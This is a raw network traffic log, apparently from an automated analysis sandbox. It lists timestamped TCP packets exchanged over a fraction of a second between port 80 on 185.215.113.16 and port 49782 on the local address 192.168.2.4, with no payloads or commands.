Nov 30, 2024 04:06:20.300290108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.300343037 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.300410032 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.300462961 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.301187038 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.301229954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.301282883 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.301323891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.302084923 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.302129030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.302187920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.302236080 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.302984953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.303034067 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.303086042 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.303133965 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.303932905 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.303975105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.304024935 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.304075956 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.304816008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.304856062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.304919004 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.304958105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.305741072 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.305787086 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.305846930 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.305887938 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.306653023 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.306705952 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.306762934 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.306826115 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.307594061 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.307640076 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.307686090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.307951927 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.308473110 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.308528900 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.308592081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.308633089 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.309360027 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.309410095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.309469938 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.309509039 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.310297012 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.310340881 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.310396910 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.310436010 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.311182976 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.311225891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.311285019 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.311336040 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.312107086 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.312158108 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.312225103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.312268972 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.313014984 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.313060045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.313132048 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.313169956 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.313966990 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.314007044 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.314083099 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.314122915 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.314830065 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.314874887 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.314912081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.314954996 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.315756083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.315809965 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.315871954 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.315917015 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.316648960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.316690922 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.316761971 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.316804886 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.317553043 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.317599058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.317671061 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.317718029 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.318463087 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.318505049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.318562984 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.318604946 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.319364071 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.319412947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.319468975 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.319509029 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.320291042 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.320334911 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.320383072 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.320487022 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.321216106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.321260929 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.321296930 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.321329117 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.322088003 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.322132111 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.322191000 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.322235107 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.322993040 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.323045015 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.323066950 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.323116064 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.323909998 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.323956966 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.324022055 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.324073076 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.324815035 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.324861050 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.324940920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.325009108 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.325747013 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.325798035 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.325845003 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.325903893 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.326637983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.326690912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.326746941 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.326790094 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.327536106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.327593088 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.327635050 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.327681065 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.328463078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.328506947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.328569889 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.328610897 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.329365015 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.329411983 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.329503059 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.329545021 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.330244064 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.330295086 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.330431938 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.330472946 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.331176043 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.331227064 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.331281900 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.331327915 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.332088947 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.332134008 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.332258940 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.332303047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.332983971 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.333026886 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.496418953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.496512890 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.496604919 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.496655941 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.496871948 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.496922016 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.497051001 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.497107983 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.497697115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.497745037 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.497828007 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.497876883 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.498583078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.498642921 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.498712063 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.498756886 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.499536991 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.499588013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.499725103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.499773979 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.500391006 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.500437975 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.500507116 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.500550985 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.501300097 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.501349926 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.501490116 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.501537085 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.502218962 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.502264977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.502321959 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.502367973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.503112078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.503160000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.503216028 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.503262043 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.504024982 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.504070044 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.504142046 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.504189968 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.504910946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.504962921 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.505028009 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.505079031 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.505815029 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.505862951 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.505930901 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.505980015 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.506722927 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.506778002 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.506882906 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.506939888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.507663965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.507720947 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.507742882 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.507792950 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.508548021 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.508609056 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.508682013 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.508729935 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.509450912 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.509500027 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.509557009 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.509609938 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.510360003 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.510411024 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.510472059 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.510523081 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.511260033 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.511307001 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.511382103 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.511435986 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.512193918 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.512240887 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.512243032 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.512276888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.513108969 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.513159990 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.513212919 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.513257980 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.513998032 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.514045954 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.514106989 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.514153957 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.514914036 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.514962912 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.515022993 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.515070915 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.515805960 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.515855074 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.516009092 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.516056061 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.516742945 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.516793013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.516829967 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.516879082 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.517627001 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.517678022 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.517731905 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.517781019 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.518537998 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.518589973 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.518655062 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.518702030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.519454002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.519503117 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.519562006 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.519608974 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.520351887 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.520399094 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.520457983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.520499945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.521260977 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.521311045 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.521344900 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.521394968 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.522161961 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.522205114 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.522272110 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.522320032 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.523067951 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.523117065 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.523200035 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.523251057 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.524000883 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.524046898 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.524204969 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.524250984 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.524914980 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.524966955 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.525024891 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.525074005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.525829077 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.525890112 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.525926113 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.525975943 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.526721954 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.526779890 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.526829958 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.526884079 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.527621984 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.527678013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.527730942 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.527782917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.528531075 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.528587103 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.528620958 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.528672934 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.529434919 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.529486895 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.529561996 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.529613972 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.530339003 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.530386925 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.530523062 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.530595064 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.531256914 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.531310081 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.531593084 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.531644106 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.532170057 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.532217979 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.532223940 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.532269001 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.533085108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.533135891 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.533207893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.533257008 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.533979893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.534030914 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.534085035 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.534136057 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.534903049 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.534955978 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.535015106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.535062075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.535783052 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.535831928 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.535891056 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.535937071 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.536710024 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.536758900 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.536823988 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.536870956 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.537623882 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.537669897 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.537724972 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.537796974 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.538535118 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.538585901 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.538639069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.538681030 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:20.539460897 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:20.539505959 CET	49782	80	192.168.2.4	185.215.113.16
